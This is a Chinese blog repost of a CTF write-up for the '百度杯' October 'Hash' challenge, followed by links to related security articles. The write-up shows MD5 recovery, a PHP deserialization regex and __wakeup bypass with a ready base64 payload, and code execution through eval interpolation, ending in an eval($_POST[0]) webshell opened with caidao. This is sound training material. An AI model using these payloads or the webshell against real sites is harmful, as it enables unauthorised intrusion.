“百度杯”CTF比赛 十月场 Hash 复现

最新推荐文章于 2022-01-09 00:43:40 发布
最新推荐文章于 2022-01-09 00:43:40 发布
阅读量693 收藏
点赞数 1
CC 4.0 BY-SA版权
文章标签: php
原文链接:http://www.cnblogs.com/haozhizhi/p/10770449.html
本文详细解析了如何通过PHP序列化绕过正则检查,利用构造的payload获取敏感信息。从MD5解密到源码审计,再到序列化对象的构造,最终实现远程代码执行,获取flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

进入题后老套路得到两个关键:

1.$hash=md5($sign.$key);the length of $sign is 8

2.key=123&hash=f9109d5f83921a551cf859f853afe7bb

然后md5解密那个hash=kkkkkk01123

根据源码说的$sign位数为8位,后改一下key 然后md5后得到提示Gu3ss_m3_h2h2.php这个文件

<?php
class Demo {
    private $file = 'Gu3ss_m3_h2h2.php';

    public function __construct($file) {
        $this->file = $file;
    }

    function __destruct() {
        echo @highlight_file($this->file, true);
    }

    function __wakeup() {
        if ($this->file != 'Gu3ss_m3_h2h2.php') {
            //the secret is in the f15g_1s_here.php
            $this->file = 'Gu3ss_m3_h2h2.php';
        }
    }
}

if (isset($_GET['var'])) {
    $var = base64_decode($_GET['var']);
    if (preg_match('/[oc]:\d+:/i', $var)) {
        die('stop hacking!');
    } else {

        @unserialize($var);
    }
} else {
    highlight_file("Gu3ss_m3_h2h2.php");
}
?>

拿到源码了,审计代码

首先得到一个参数var 然后进行正则匹配

说下这个正则 /[oc]:\d+:/i  [oc]  两个字母构成的原子表加:再加只是一个数字,再加: 然后不区分大小写

这个O 是序列化里面的类 C是自定义序列化方式

如果这个正则的绕过是O:+4 这样就可以绕过

然后写payload:

TzorNDoiRGVtbyI6ODp7czoxMDoiAERlbW8AZmlsZSI7czoxNjoiZjE1Z18xc19oZXJlLnBocCI7fQ==  出来拿去用

<?php
if (isset($_GET['val'])) {
    $val = $_GET['val'];
    eval('$value="' . addslashes($val) . '";');
} else {
    die('hahaha!');
}

?>

 

继续审计,看到这个熟悉的php复制变量${phpinfo()}  像这样的他会先执行里面 的方法

直接构造payload:eval($_POST[0])    这里一句话的密码 不能用引号 应该是那个addsalashes的原因

然后就菜刀连上去就看到flag了

转载于:https://www.cnblogs.com/haozhizhi/p/10770449.html

Msro
关注
[系统安全] 二十二.PE数字签名之(下)微软证书漏洞CVE-2020-0601复现及Windows验证机制分析
杨秀璋的专栏
02-17 1万+
作者前文介绍了什么是数字签名,利用Asn1View、PEVie、010Editor等工具进行数据提取和分析,这是全网非常新的一篇文章,希望对您有所帮助。这篇文章将详细介绍微软证书漏洞CVE-2020-0601,并讲解ECC算法、Windows验证机制,复现可执行文件签名证书的例子。 这些基础性知识不仅和系统安全相关,同样与我们身边常用的软件、文档、操作系统紧密联系,希望这些知识对您有所帮助,更希望大家提高安全意识,安全保障任重道远。本文参考了参考文献中的文章,并结合自己的经验和实践进行撰写,也推荐大家阅读参
[网络安全自学篇] 七十三.WannaCry勒索病毒复现及分析(四)蠕虫传播机制全网源码详细解读
热门推荐
杨秀璋的专栏
05-05 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了逆向分析OllyDbg动态调试工具的基本用法,包括界面介绍、常用快捷键和TraceMe案例分析。这篇文章将继续详细讲解WannaCry蠕虫的传播机制,带领大家详细阅读源代码,分享WannaCry勒索病毒是如何传播感染的。作者分析该病毒一个月,一方面觉得自己技术菜,另一方面深知系统安全需要坚持,继续加油。希望文章对您有所帮助~
CTF日记之 “百度CTF比赛 十月 Hash
sunleibaba的博客
02-01 614
CTF日记:“百度CTF比赛 十月 Hash 点进去之后发现“haha”,而且haha还可以点击,先不要急着点击haha,先查看源代码,发现了参数?key=123&hash=f9109d5f83921a551cf859f853afe7bb;这个东西可能会有用吧,再点击haha,发现: 此时我们的url正是我们刚刚查看的参数,再次查看源代码,发现: 源代码中告诉我们:hash这个参数是把sign参数和key参数拼接起来进行md5加密得到的,其中的key=123我们是知道的,现在就要通过爆破
百度CTF比赛 十月 Hash
feng的博客
10-04 687
WP 这题也是学习到了很多新的姿势,是一个不错的题目。 WP 进入环境,点击haha,提示:you are 123;if you are not 123,you can get the flag。 再看看,发现get参数里有key=123&hash=f9109d5f83921a551cf859f853afe7bb f12查看源码,发现$hash=md5($sign.$key);the length of $sign is 8 因此我们需要知道$sign是多少。我利用在线md5解密工具,上面的hash
[i春秋]“百度CTF比赛 十月-Hash
笑花大王
02-03 664
前言 涉及知识点:反序列化、代码执行、命令执行 题目来自:i春秋 hash 如果i春秋题目有问题可以登录榆林学院信息安全协会CTF平台使用 或者利用本文章提供的源码自主复现 [i春秋]“百度CTF比赛 十月-Hash 点击hahaha进入下一个页面 进入之后我们发现这有一段英文说如果不是123 我们就可以获得flag 我们分析URL key部分有个123 我们替换成...
百度CTF比赛 十月--hash
Oavinci的博客
05-22 654
知识点: 正则表达式绕过(+) __wakeup()绕过方法 源代码提示: hash解码得到sign=kkkkkk01 构造: ?key=111&hash=adaa10eef3a02754da03b5a3a6f40ae6 得到: Gu3ss_m3_h2h2.php <?php class Demo { private $file = 'Gu3ss_m3_h2h2.php'; public function __construct($fil...
百度CTF比赛 十月 Web-Hash
qq_34106499的博客
01-21 699
1. 细心查看源码 2. MD5加密与解密 3. PHP中序列化与反序列化的应用 4. 反序列化中正则表达式与强制文件名限制的绕过 5. base64加密与解密 6. eval函数中执行php源码的漏洞利用 7. eval函数中执行系统命令时绕过addslash函数
n1ctf(部分复现
pwnyuan's blog
11-05 1275
N1CTF 2020 部分复现BeforeCryptoVSS源码思路脚本其他视觉密码方案Mersenne Twisterrandcrack库-RandCrackEasy_RSA源码思路脚本其他基于密码学中格的基础知识FlagBot源码思路After Before 这半个月一连串的比赛,淦,爷要脑溢血了(两眼一黑,直接去世) 导致我现在才复现N1CTF 菜狗表示签到和签退好评,淦 复现的时候学到好多,有些东西要找个时间梳理一下了,这里仅仅放一下我的一些理解和想法好了 继续肝ctf! 淦啊!这已经不是wp了,是
流量分析——安恒八月月赛CTF
xiaogaoxiaoyuan的博客
01-09 3892
一、题目背景 某公司内网网络被黑客渗透,简单了解,黑客首先攻击了一台web服务器,破解了后台的账户密码,随之利用破解的账号密码登陆了mail系统,然后获取了vpn的申请方式,然后登陆了vpn,在内网pwn掉了一台打印机,请根据提供的流量包回答下面有关问题 二、关卡列表 1 某公司内网网络被黑客渗透,请分析流量,给出黑客使用的扫描器 2 某公司内网网络被黑客渗透,请分析流量,得到黑客扫描到的登陆后台是(相对路径即可) 3 某公司内网网络被黑客渗透,请分析流量,得到黑客使用了什么账号密码登陆了web后台(形式:
护网部分题目题解
0verWatch的博客
10-14 4664
前言 护网的这次比赛还是很有收获的,至少在web方面我认为是这样的,还是得继续努力吧。。。 正文 MISC 迟来的签到 AAoHAR1UIFBSJFFQU1AjUVEjVidWUVJVJVZUIyUnI18jVFNXVRs= 题目说要异或,那就直接爆破异或就好 写个小脚本就可以得到flag import base64 a = &quot;AAoHAR1UIFBSJFFQU1AjUVEjVidWUVJV...
百度CTF比赛 十月 GetFlag
feng的博客
09-30 630
这题主要考察了用python写脚本来爆破md5,然后是SQL注入中的万能密码,然后是文件下载后最后对eval函数的考察。
CTF日记之 “百度CTF比赛 十月
sunleibaba的博客
01-28 529
CTF日记:“百度CTF比赛 十月 Vld 点开之后发现: 还是先查看源代码: 访问: index.php.txt 发现了一堆这个东西,然后根据之前的界面上写的do you know Vulcan Logic Dumper?,百度一下“Vulcan Logic Dumper”: 这肯定就是所谓的Vulcan Logic Dumper了,先了解下相关概念 PHP内核-Zend引擎:http://www.php.cn/php-weizijiaocheng-355597.html PHP中的opc
百度CTF比赛 十月 fuzzing
feng的博客
10-05 881
前言 这题并没有什么特别难的地方,考察的点也不算很深,自己主要还是知识面太窄和思考问题太死板上面。 WP 首先进入环境,提示there is nothing。f12查看源码,用dirsearch扫,试试备份文件也找不到什么,只能Burp抓包看看,发现了相应头里有提示: hint: ip,Large internal network 这和ip有关,自己一开始也以为是x-forwarded-for,试了127.0.0.1然后没什么用,然后就卡住了。其实这样还是自己知识面的问题,自己对于内网的了解实在太少了。这
CTF日记之 “百度CTF比赛 十月 GetFlag
sunleibaba的博客
01-27 684
CTF日记:“百度CTF比赛 十月 GetFlag 打开题目,看到一个被嘲讽的界面,然鹅自己并不是单身狗。。。正常思路,查看源码,发现正常,之后点击login: 还是先查看源码,发现有没有疏漏什么东西,发现一切正常,在进行抓包看看有没有什么疏漏的东西,发现也一切正常,下面开始把关注点放在这个页面上面。正常的登录框,再加上一个验证码,这个验证码的意思是:一个数的md5值的前六位是afce73,那我们就进行爆破计算: python脚本 import hashlib i=1 while True:
i春秋 “百度CTF比赛 十月 Vld
include_heqile的博客
09-27 1341
https://www.ichunqiu.com/battalion?t=1&amp;r=0 opcode中的 BEGIN_SILENCE就是@,不显示报错信息 猜测opcode中的 EXT_STMT就是;,表示一个语句的结束 opcode中的FETCH_R意思是从某个变量中取出值并把这个值赋给另一个变量 详细信息参考php opcode JMPZ,若比较结果为false,则跳转到指定地址处的代码...
百度CTF比赛 十月 - try again
Darenfy 随记
01-06 487
题目内容: try to find the flag 附件下载 解题思路 老规矩,没有任何后缀的可执行文件,直接扔 010editor 里面,然后尝试性查找 flag
百度CTF比赛 十月 Web-登录
qq_34106499的博客
02-18 1664
1. mysql盲注及脚本编写 2. .git泄露
i春秋 “百度CTF比赛 十月 hash writeup
weixin_43442029的博客
01-12 507
0x00 打开链接后,是一个hahaha的超链接,点进去以后要用key的值不是123的hash值过关,源代码里提示是MD5加密,在key前还有一段8位的sign值。 于是在网上找MD5解密的网站,解出来 sign = kkkkkk01 用122作为key,拼上sign的值,MD5加密后得到 hash = e1ebb04a0a78afe23e2d542e72a25005 输入正确的ke...
百度CTF比赛 十月 writeup
weixin_45871855的博客
08-30 1681
分值:10分 类型:Misc题目名称:考眼力未解答 题目内容: gmbh{4d850d5c3c2756f67b91cbe8f046eebd} try to find the flag
i春秋 “百度CTF比赛 十月 Gift
include_heqile的博客
10-24 2584
https://www.ichunqiu.com/battalion?t=1&amp;amp;amp;amp;amp;r=0 进入题目链接,是一张黑人问号图片: 直接使用burp suite抓包送到Repeater模块,检查发送和相应报文的HTTP头部字段,并未发现可疑字段,图片是base64编码,点击href链接,依然还是刚的页面,尝试更改请求方法,将GET更改为POST,响应如下: 如果了解过Django的话应该很容易看...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值